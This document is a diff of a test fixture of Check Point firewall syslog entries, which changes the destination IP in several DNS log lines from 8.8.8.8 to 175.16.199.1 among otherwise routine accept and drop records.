+<134>1 2020-03-29T16:54:00Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2a8,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500840"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42118"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2b1,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500849"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32849"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2b2,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500850"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55943"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:19Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2bb,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500859"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36141"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2bc,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500860"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45077"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:54:21Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2bd,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:54:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2be,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"32890"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:54:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2be,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60032"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10230"; xlatesrc:"0.0.0.0"]
@@ -1521,13 +1521,13 @@
 <134>1 2020-03-29T16:54:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2be,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34352"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43489"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:54:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2be,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39243"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:54:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2be,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53636"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26808"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60576"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59345"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59225"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c6,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500870"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47185"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60576"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59345"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c5,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500869"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59225"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2c6,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500870"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47185"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:54:31Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2c7,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44917"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:54:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2cf,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500879"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:54:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2cf,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500879"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58281"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2cf,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500879"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:54:39Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d2cf,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500879"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58281"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:54:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d2dd,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"]
 <134>1 2020-03-29T16:55:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d319,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50047"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T16:55:53Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d319,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50048"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -1546,165 +1546,165 @@
 <134>1 2020-03-29T16:56:06Z gw-da58d3 CheckPoint 1930 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d328,0x0,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"67"; service:"68"; service_id:"dhcp-rep-localmodule"; src:"192.168.0.254"]
 <134>1 2020-03-29T16:56:13Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"]
 <134>1 2020-03-29T16:56:14Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d32d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.196"]
